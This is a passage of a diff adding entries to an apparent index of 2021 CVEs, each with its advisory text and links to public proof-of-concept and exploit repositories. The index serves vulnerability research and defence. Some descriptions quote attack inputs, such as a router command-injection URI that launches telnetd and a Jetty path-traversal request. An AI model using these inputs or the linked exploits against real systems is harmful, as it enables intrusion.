ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.1, upgrade to 5.6.2 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.
+
+
+- [kahla-sec/CVE-2021-27850_POC](https://github.com/kahla-sec/CVE-2021-27850_POC)
+- [dorkerdevil/CVE-2021-27850_POC](https://github.com/dorkerdevil/CVE-2021-27850_POC)
+- [Ovi3/CVE_2021_27850_POC](https://github.com/Ovi3/CVE_2021_27850_POC)
+- [novysodope/CVE-2021-27850](https://github.com/novysodope/CVE-2021-27850)
+
+### CVE-2021-27890 (2021-03-15)
+
+SQL Injection vulnerablity in MyBB before 1.8.26 via theme properties included in theme XML files.
+
+
+- [xiaopan233/Mybb-XSS_SQL_RCE-POC](https://github.com/xiaopan233/Mybb-XSS_SQL_RCE-POC)
+
+### CVE-2021-27905 (2021-04-13)
+
+The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
+
+
+- [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF)
+- [W2Ning/Solr-SSRF](https://github.com/W2Ning/Solr-SSRF)
+- [murataydemir/CVE-2021-27905](https://github.com/murataydemir/CVE-2021-27905)
+- [pdelteil/CVE-2021-27905.POC](https://github.com/pdelteil/CVE-2021-27905.POC)
+
+### CVE-2021-27928 (2021-03-19)
+
+A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.
+
+
+- [Al1ex/CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928)
+- [shamo0/CVE-2021-27928-POC](https://github.com/shamo0/CVE-2021-27928-POC)
+- [LalieA/CVE-2021-27928](https://github.com/LalieA/CVE-2021-27928)
+
+### CVE-2021-27963 (2021-03-05)
+
+SonLogger before 6.4.1 is affected by user creation with any user permissions profile (e.g., SuperAdmin). An anonymous user can send a POST request to /User/saveUser without any authentication or session header.
+
+
+- [erberkan/SonLogger-vulns](https://github.com/erberkan/SonLogger-vulns)
+
+### CVE-2021-27965 (2021-03-05)
+
+The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request.
+
+
+- [mathisvickie/CVE-2021-27965](https://github.com/mathisvickie/CVE-2021-27965)
+- [Jeromeyoung/CVE-2021-27965](https://github.com/Jeromeyoung/CVE-2021-27965)
+- [fengjixuchui/CVE-2021-27965](https://github.com/fengjixuchui/CVE-2021-27965)
+
+### CVE-2021-28079 (2021-04-26)
+
+Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.
+
+
+- [g33xter/CVE-2021-28079](https://github.com/g33xter/CVE-2021-28079)
+
+### CVE-2021-28164 (2021-04-01)
+
+In Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224, the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
+
+
+- [jammy0903/-jettyCVE-2021-28164-](https://github.com/jammy0903/-jettyCVE-2021-28164-)
+
+### CVE-2021-28165 (2021-04-01)
+
+In Eclipse Jetty 7.2.2 to 9.4.38, 10.0.0.alpha0 to 10.0.1, and 11.0.0.alpha0 to 11.0.1, CPU usage can reach 100% upon receiving a large invalid TLS frame.
+
+
+- [uthrasri/CVE-2021-28165](https://github.com/uthrasri/CVE-2021-28165)
+- [hshivhare67/Jetty_v9.4.31_CVE-2021-28165](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2021-28165)
+
+### CVE-2021-28310 (2021-04-13)
+
+Win32k Elevation of Privilege Vulnerability
+
+
+- [Rafael-Svechinskaya/IOC_for_CVE-2021-28310](https://github.com/Rafael-Svechinskaya/IOC_for_CVE-2021-28310)
+
+### CVE-2021-28312 (2021-04-13)
+
+Windows NTFS Denial of Service Vulnerability
+
+
+- [shubham0d/CVE-2021-28312](https://github.com/shubham0d/CVE-2021-28312)
+
+### CVE-2021-28378 (2021-03-15)
+
+Gitea 1.12.x and 1.13.x before 1.13.4 allows XSS via certain issue data in some situations.
+
+
+- [pandatix/CVE-2021-28378](https://github.com/pandatix/CVE-2021-28378)
+
+### CVE-2021-28476 (2021-05-11)
+
+Windows Hyper-V Remote Code Execution Vulnerability
+
+
+- [0vercl0k/CVE-2021-28476](https://github.com/0vercl0k/CVE-2021-28476)
+- [bluefrostsecurity/CVE-2021-28476](https://github.com/bluefrostsecurity/CVE-2021-28476)
+- [LaCeeKa/CVE-2021-28476-tools-env](https://github.com/LaCeeKa/CVE-2021-28476-tools-env)
+- [australeo/CVE-2021-28476](https://github.com/australeo/CVE-2021-28476)
+- [2273852279qqs/0vercl0k](https://github.com/2273852279qqs/0vercl0k)
+- [dengyang123x/0vercl0k](https://github.com/dengyang123x/0vercl0k)
+
+### CVE-2021-28480 (2021-04-13)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [ZephrFish/CVE-2021-28480_HoneyPoC3](https://github.com/ZephrFish/CVE-2021-28480_HoneyPoC3)
+- [Threonic/CVE-2021-28480](https://github.com/Threonic/CVE-2021-28480)
+
+### CVE-2021-28482 (2021-04-13)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [Shadow0ps/CVE-2021-28482-Exchange-POC](https://github.com/Shadow0ps/CVE-2021-28482-Exchange-POC)
+- [KevinWorst/CVE-2021-28482_Exploit](https://github.com/KevinWorst/CVE-2021-28482_Exploit)
+- [timb-machine-mirrors/testanull-CVE-2021-28482.py](https://github.com/timb-machine-mirrors/testanull-CVE-2021-28482.py)
+
+### CVE-2021-28663 (2021-05-10)
+
+The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.
+
+
+- [lntrx/CVE-2021-28663](https://github.com/lntrx/CVE-2021-28663)
+
+### CVE-2021-28750
+- [PfalzPrince/CVE-2021-28750-site](https://github.com/PfalzPrince/CVE-2021-28750-site)
+
+### CVE-2021-29002 (2021-03-24)
+
+A stored cross-site scripting (XSS) vulnerability in Plone CMS 5.2.3 exists in site-controlpanel via the "form.widgets.site_title" parameter.
+
+
+- [miguelc49/CVE-2021-29002-1](https://github.com/miguelc49/CVE-2021-29002-1)
+
+### CVE-2021-29003 (2021-04-13)
+
+Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI.
+
+
+- [jaysharma786/CVE-2021-29003](https://github.com/jaysharma786/CVE-2021-29003)
+
+### CVE-2021-29155 (2021-04-20)
+
+An issue was discovered in the Linux kernel through 5.11.x. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information from kernel memory. Specifically, for sequences of pointer arithmetic operations, the pointer modification performed by the first operation is not correctly accounted for when restricting subsequent operations.
+
+
+- [benschlueter/CVE-2021-29155](https://github.com/benschlueter/CVE-2021-29155)
+
+### CVE-2021-29156 (2021-03-25)
+
+ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key.
+
+
+- [guidepointsecurity/CVE-2021-29156](https://github.com/guidepointsecurity/CVE-2021-29156)
+- [5amu/CVE-2021-29156](https://github.com/5amu/CVE-2021-29156)
+
+### CVE-2021-29200 (2021-04-27)
+
+Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
+
+
+- [freeide/CVE-2021-29200](https://github.com/freeide/CVE-2021-29200)
+
+### CVE-2021-29267 (2021-03-29)
+
+Sherlock SherlockIM through 2021-03-29 allows Cross Site Scripting (XSS) by leveraging the api/Files/Attachment URI to attack help-desk staff via the chatbot feature.
+
+
+- [Security-AVS/CVE-2021-29267](https://github.com/Security-AVS/CVE-2021-29267)
+
+### CVE-2021-29337 (2021-06-21)
+
+MODAPI.sys in MSI Dragon Center 2.0.104.0 allows low-privileged users to access kernel memory and potentially escalate privileges via a crafted IOCTL 0x9c406104 call. This IOCTL provides the MmMapIoSpace feature for mapping physical memory.
+
+
+- [rjt-gupta/CVE-2021-29337](https://github.com/rjt-gupta/CVE-2021-29337)
+
+### CVE-2021-29349 (2021-03-31)
+
+Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php pieform_delete_all_notifications request, which leads to removing all messages from a mailbox.
+
+
+- [0xBaz/CVE-2021-29349](https://github.com/0xBaz/CVE-2021-29349)
+- [Vulnmachines/CVE-2021-29349](https://github.com/Vulnmachines/CVE-2021-29349)
+
+### CVE-2021-29440 (2021-04-13)
+
+Grav is a file based Web-platform. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. The issue was addressed in version 1.7.11.
+
+
+- [CsEnox/CVE-2021-29440](https://github.com/CsEnox/CVE-2021-29440)
+
+### CVE-2021-29441 (2021-04-27)
+
+Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server.
+
+
+- [hh-hunter/nacos-cve-2021-29441](https://github.com/hh-hunter/nacos-cve-2021-29441)
+- [bysinks/CVE-2021-29441](https://github.com/bysinks/CVE-2021-29441)
+
+### CVE-2021-29447 (2021-04-15)
+
+Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
+
+
+- [motikan2010/CVE-2021-29447](https://github.com/motikan2010/CVE-2021-29447)
+- [Vulnmachines/wordpress_cve-2021-29447](https://github.com/Vulnmachines/wordpress_cve-2021-29447)
+- [dnr6419/CVE-2021-29447](https://github.com/dnr6419/CVE-2021-29447)
+- [AssassinUKG/CVE-2021-29447](https://github.com/AssassinUKG/CVE-2021-29447)
+- [b-abderrahmane/CVE-2021-29447-POC](https://github.com/b-abderrahmane/CVE-2021-29447-POC)
+- [elf1337/blind-xxe-controller-CVE-2021-29447](https://github.com/elf1337/blind-xxe-controller-CVE-2021-29447)
+- [Val-Resh/CVE-2021-29447-POC](https://github.com/Val-Resh/CVE-2021-29447-POC)
+- [M3l0nPan/wordpress-cve-2021-29447](https://github.com/M3l0nPan/wordpress-cve-2021-29447)
+- [mega8bit/exploit_cve-2021-29447](https://github.com/mega8bit/exploit_cve-2021-29447)
+- [thomas-osgood/CVE-2021-29447](https://github.com/thomas-osgood/CVE-2021-29447)
+- [Abdulazizalsewedy/CVE-2021-29447](https://github.com/Abdulazizalsewedy/CVE-2021-29447)
+- [G01d3nW01f/CVE-2021-29447](https://github.com/G01d3nW01f/CVE-2021-29447)
+- [viardant/CVE-2021-29447](https://github.com/viardant/CVE-2021-29447)
+- [0xRar/CVE-2021-29447-PoC](https://github.com/0xRar/CVE-2021-29447-PoC)
+- [andyhsu024/CVE-2021-29447](https://github.com/andyhsu024/CVE-2021-29447)
+
+### CVE-2021-29505 (2021-05-28)
+
+XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream versions prior to 1.4.17 may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types is affected. The vulnerability is patched in version 1.4.17.
+
+
+- [MyBlackManba/CVE-2021-29505](https://github.com/MyBlackManba/CVE-2021-29505)
+
+### CVE-2021-29627 (2021-04-07)
+
+In FreeBSD 13.0-STABLE before n245050, 12.2-STABLE before r369525, 13.0-RC4 before p0, and 12.2-RELEASE before p6, listening socket accept filters implementing the accf_create callback incorrectly freed a process supplied argument string. Additional operations on the socket can lead to a double free or use after free.
+
+
+- [raymontag/cve-2021-29627](https://github.com/raymontag/cve-2021-29627)
+
+### CVE-2021-30005 (2021-05-11)
+
+In JetBrains PyCharm before 2020.3.4, local code execution was possible because of insufficient checks when getting the project from VCS.
+
+
+- [atorralba/CVE-2021-30005-POC](https://github.com/atorralba/CVE-2021-30005-POC)
+
+### CVE-2021-30109 (2021-04-05)
+
+Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module.
+
+
+- [Hackdwerg/CVE-2021-30109](https://github.com/Hackdwerg/CVE-2021-30109)
+
+### CVE-2021-30128 (2021-04-27)
+
+Apache OFBiz has unsafe deserialization prior to 17.12.07 version
+
+
+- [LioTree/CVE-2021-30128-EXP](https://github.com/LioTree/CVE-2021-30128-EXP)
+
+### CVE-2021-30146 (2021-04-06)
+
+Seafile 7.0.5 (2019) allows Persistent XSS via the "share of library functionality."
+
+
+- [Security-AVS/CVE-2021-30146](https://github.com/Security-AVS/CVE-2021-30146)
+
+### CVE-2021-30357 (2021-06-08)
+
+SSL Network Extender Client for Linux before build 800008302 reveals part of the contents of the configuration file supplied, which allows partially disclosing files to which the user did not have access.
+
+
+- [joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC](https://github.com/joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC)
+
+### CVE-2021-30461 (2021-05-29)
+
+A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.
+
+
+- [daedalus/CVE-2021-30461](https://github.com/daedalus/CVE-2021-30461)
+- [Vulnmachines/CVE-2021-30461](https://github.com/Vulnmachines/CVE-2021-30461)
+- [Al1ex/CVE-2021-30461](https://github.com/Al1ex/CVE-2021-30461)
+- [puckiestyle/CVE-2021-30461](https://github.com/puckiestyle/CVE-2021-30461)
+
+### CVE-2021-30481 (2021-04-10)
+
+Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click.
+
+
+- [floesen/CVE-2021-30481](https://github.com/floesen/CVE-2021-30481)
+- [JHVIW/jhviw.github.io](https://github.com/JHVIW/jhviw.github.io)
+
+### CVE-2021-30551 (2021-06-15)
+
+Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [xmzyshypnc/CVE-2021-30551](https://github.com/xmzyshypnc/CVE-2021-30551)
+
+### CVE-2021-30573 (2021-08-03)
+
+Use after free in GPU in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [s4e-lab/CVE-2021-30573-PoC-Google-Chrome](https://github.com/s4e-lab/CVE-2021-30573-PoC-Google-Chrome)
+- [orangmuda/CVE-2021-30573](https://github.com/orangmuda/CVE-2021-30573)
+- [kh4sh3i/CVE-2021-30573](https://github.com/kh4sh3i/CVE-2021-30573)
+
+### CVE-2021-30632 (2021-10-08)
+
+Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [Phuong39/PoC-CVE-2021-30632](https://github.com/Phuong39/PoC-CVE-2021-30632)
+- [CrackerCat/CVE-2021-30632](https://github.com/CrackerCat/CVE-2021-30632)
+- [maldev866/ChExp_CVE-2021-30632](https://github.com/maldev866/ChExp_CVE-2021-30632)
+- [paulsery/CVE-2021-30632](https://github.com/paulsery/CVE-2021-30632)
+
+### CVE-2021-30641 (2021-06-10)
+
+Apache HTTP Server versions 2.4.39 to 2.4.46 Unexpected matching behavior with 'MergeSlashes OFF'
+
+
+- [dja2TaqkGEEfA45/CVE-2021-30641](https://github.com/dja2TaqkGEEfA45/CVE-2021-30641)
+
+### CVE-2021-30657 (2021-09-08)
+
+A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited..
+
+
+- [shubham0d/CVE-2021-30657](https://github.com/shubham0d/CVE-2021-30657)
+
+### CVE-2021-30682 (2021-09-08)
+
+A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information.
+
+
+- [threatnix/csp-playground](https://github.com/threatnix/csp-playground)
+
+### CVE-2021-30731 (2021-09-08)
+
+This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Catalina. An unprivileged application may be able to capture USB devices.
+
+
+- [osy/WebcamViewer](https://github.com/osy/WebcamViewer)
+
+### CVE-2021-30807 (2021-10-19)
+
+A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.5.1, iOS 14.7.1 and iPadOS 14.7.1, watchOS 7.6.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.
+
+
+- [jsherman212/iomfb-exploit](https://github.com/jsherman212/iomfb-exploit)
+- [30440r/gex](https://github.com/30440r/gex)
+
+### CVE-2021-30853 (2021-08-24)
+
+This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6. A malicious application may bypass Gatekeeper checks.
+
+
+- [shubham0d/CVE-2021-30853](https://github.com/shubham0d/CVE-2021-30853)
+
+### CVE-2021-30858 (2021-08-24)
+
+A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
+
+
+- [kmeps4/CVEREV3](https://github.com/kmeps4/CVEREV3)
+- [Jeromeyoung/ps4_8.00_vuln_poc](https://github.com/Jeromeyoung/ps4_8.00_vuln_poc)
+
+### CVE-2021-30860 (2021-08-24)
+
+An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
+
+
+- [Levilutz/CVE-2021-30860](https://github.com/Levilutz/CVE-2021-30860)
+- [jeffssh/CVE-2021-30860](https://github.com/jeffssh/CVE-2021-30860)
+
+### CVE-2021-30937 (2021-08-24)
+
+A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges.
+
+
+- [realrodri/ExploiteameEsta](https://github.com/realrodri/ExploiteameEsta)
+
+### CVE-2021-30955 (2021-08-24)
+
+A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.
+
+
+- [timb-machine-mirrors/jakeajames-CVE-2021-30955](https://github.com/timb-machine-mirrors/jakeajames-CVE-2021-30955)
+- [nickorlow/CVE-2021-30955-POC](https://github.com/nickorlow/CVE-2021-30955-POC)
+- [verygenericname/CVE-2021-30955-POC-IPA](https://github.com/verygenericname/CVE-2021-30955-POC-IPA)
+- [b1n4r1b01/desc_race](https://github.com/b1n4r1b01/desc_race)
+- [markie-dev/desc_race_A15](https://github.com/markie-dev/desc_race_A15)
+- [Dylbin/desc_race](https://github.com/Dylbin/desc_race)
+- [GeoSn0w/Pentagram-exploit-tester](https://github.com/GeoSn0w/Pentagram-exploit-tester)
+
+### CVE-2021-30956 (2021-08-24)
+
+A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2. An attacker with physical access to a device may be able to see private contact information.
+
+
+- [fordsham/CVE-2021-30956](https://github.com/fordsham/CVE-2021-30956)
+
+### CVE-2021-31159 (2021-06-16)
+
+Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732.
+
+
+- [ricardojoserf/CVE-2021-31159](https://github.com/ricardojoserf/CVE-2021-31159)
+
+### CVE-2021-31166 (2021-05-11)
+
+HTTP Protocol Stack Remote Code Execution Vulnerability
+
+
+- [0vercl0k/CVE-2021-31166](https://github.com/0vercl0k/CVE-2021-31166)
+- [zha0gongz1/CVE-2021-31166](https://github.com/zha0gongz1/CVE-2021-31166)
+- [mvlnetdev/CVE-2021-31166-detection-rules](https://github.com/mvlnetdev/CVE-2021-31166-detection-rules)
+- [corelight/CVE-2021-31166](https://github.com/corelight/CVE-2021-31166)
+- [zecopro/CVE-2021-31166](https://github.com/zecopro/CVE-2021-31166)
+- [bgsilvait/WIn-CVE-2021-31166](https://github.com/bgsilvait/WIn-CVE-2021-31166)
+- [Udyz/CVE-2021-31166](https://github.com/Udyz/CVE-2021-31166)
+- [y0g3sh-99/CVE-2021-31166-Exploit](https://github.com/y0g3sh-99/CVE-2021-31166-Exploit)
+- [antx-code/CVE-2021-31166](https://github.com/antx-code/CVE-2021-31166)
+- [imikoYa/CVE-2021-31166-exploit](https://github.com/imikoYa/CVE-2021-31166-exploit)
+- [mauricelambert/CVE-2021-31166](https://github.com/mauricelambert/CVE-2021-31166)
+- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher)
+
+### CVE-2021-31184 (2021-05-11)
+
+Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability
+
+
+- [waleedassar/CVE-2021-31184](https://github.com/waleedassar/CVE-2021-31184)
+
+### CVE-2021-31233 (2023-05-31)
+
+SQL Injection vulnerability found in Fighting Cock Information System v.1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter.
+
+
+- [gabesolomon/CVE-2021-31233](https://github.com/gabesolomon/CVE-2021-31233)
+
+### CVE-2021-31290
+- [qaisarafridi/cve-2021-31290](https://github.com/qaisarafridi/cve-2021-31290)
+
+### CVE-2021-31589 (2022-01-05)
+
+A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.
+
+
+- [karthi-the-hacker/CVE-2021-31589](https://github.com/karthi-the-hacker/CVE-2021-31589)
+
+### CVE-2021-31630 (2021-08-03)
+
+Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.
+
+
+- [hev0x/CVE-2021-31630-OpenPLC_RCE](https://github.com/hev0x/CVE-2021-31630-OpenPLC_RCE)
+- [Hunt3r0x/CVE-2021-31630-HTB](https://github.com/Hunt3r0x/CVE-2021-31630-HTB)
+- [thewhiteh4t/cve-2021-31630](https://github.com/thewhiteh4t/cve-2021-31630)
+- [mind2hex/CVE-2021-31630](https://github.com/mind2hex/CVE-2021-31630)
+- [sealldeveloper/CVE-2021-31630-PoC](https://github.com/sealldeveloper/CVE-2021-31630-PoC)
+- [junnythemarksman/CVE-2021-31630](https://github.com/junnythemarksman/CVE-2021-31630)
+- [adibabdala123/cve-2021-31630](https://github.com/adibabdala123/cve-2021-31630)
+
+### CVE-2021-31728 (2021-05-17)
+
+Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware 2.74.0.150 allows a non-privileged process to open a handle to \.\ZemanaAntiMalware, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook with IOCTL 0x80002044 and execute the executable memory using this hook with IOCTL 0x80002014 or 0x80002018, this exposes ring 0 code execution in the context of the driver allowing the non-privileged process to elevate privileges.
+
+
+- [irql/CVE-2021-31728](https://github.com/irql/CVE-2021-31728)
+
+### CVE-2021-31760 (2021-04-25)
+
+Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to achieve Remote Command Execution (RCE) through Webmin's running process feature.
+
+
+- [Mesh3l911/CVE-2021-31760](https://github.com/Mesh3l911/CVE-2021-31760)
+- [electronicbots/CVE-2021-31760](https://github.com/electronicbots/CVE-2021-31760)
+
+### CVE-2021-31761 (2021-04-25)
+
+Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.
+
+
+- [Mesh3l911/CVE-2021-31761](https://github.com/Mesh3l911/CVE-2021-31761)
+- [electronicbots/CVE-2021-31761](https://github.com/electronicbots/CVE-2021-31761)
+
+### CVE-2021-31762 (2021-04-25)
+
+Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to create a privileged user through Webmin's add users feature, and then get a reverse shell through Webmin's running process feature.
+
+
+- [Mesh3l911/CVE-2021-31762](https://github.com/Mesh3l911/CVE-2021-31762)
+- [electronicbots/CVE-2021-31762](https://github.com/electronicbots/CVE-2021-31762)
+
+### CVE-2021-31796 (2021-09-02)
+
+An inadequate encryption vulnerability discovered in CyberArk Credential Provider before 12.1 may lead to Information Disclosure. An attacker may realistically have enough information that the number of possible keys (for a credential file) is only one, and the number is usually not higher than 2^36.
+
+
+- [unmanarc/CACredDecoder](https://github.com/unmanarc/CACredDecoder)
+
+### CVE-2021-31800 (2021-05-05)
+
+Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
+
+
+- [p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write](https://github.com/p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write)
+- [Louzogh/CVE-2021-31800](https://github.com/Louzogh/CVE-2021-31800)
+
+### CVE-2021-31805 (2022-04-12)
+
+The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
+
+
+- [pyroxenites/s2-062](https://github.com/pyroxenites/s2-062)
+- [Wrin9/CVE-2021-31805](https://github.com/Wrin9/CVE-2021-31805)
+- [Axx8/Struts2_S2-062_CVE-2021-31805](https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805)
+- [jax7sec/S2-062](https://github.com/jax7sec/S2-062)
+- [aeyesec/CVE-2021-31805](https://github.com/aeyesec/CVE-2021-31805)
+- [fleabane1/CVE-2021-31805-POC](https://github.com/fleabane1/CVE-2021-31805-POC)
+- [z92g/CVE-2021-31805](https://github.com/z92g/CVE-2021-31805)
+- [nth347/CVE-2021-31805](https://github.com/nth347/CVE-2021-31805)
+
+### CVE-2021-31856 (2021-04-28)
+
+A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
+
+
+- [ssst0n3/CVE-2021-31856](https://github.com/ssst0n3/CVE-2021-31856)
+
+### CVE-2021-31862 (2021-10-29)
+
+SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.
+
+
+- [RobertDra/CVE-2021-31862](https://github.com/RobertDra/CVE-2021-31862)
+
+### CVE-2021-31955 (2021-06-08)
+
+Windows Kernel Information Disclosure Vulnerability
+
+
+- [freeide/CVE-2021-31955-POC](https://github.com/freeide/CVE-2021-31955-POC)
+
+### CVE-2021-31956 (2021-06-08)
+
+Windows NTFS Elevation of Privilege Vulnerability
+
+
+- [hzshang/CVE-2021-31956](https://github.com/hzshang/CVE-2021-31956)
+- [aazhuliang/CVE-2021-31956-EXP](https://github.com/aazhuliang/CVE-2021-31956-EXP)
+- [Y3A/CVE-2021-31956](https://github.com/Y3A/CVE-2021-31956)
+- [hoangprod/CVE-2021-31956-POC](https://github.com/hoangprod/CVE-2021-31956-POC)
+
+### CVE-2021-32099 (2021-05-07)
+
+A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass.
+
+
+- [zjicmDarkWing/CVE-2021-32099](https://github.com/zjicmDarkWing/CVE-2021-32099)
+- [ibnuuby/CVE-2021-32099](https://github.com/ibnuuby/CVE-2021-32099)
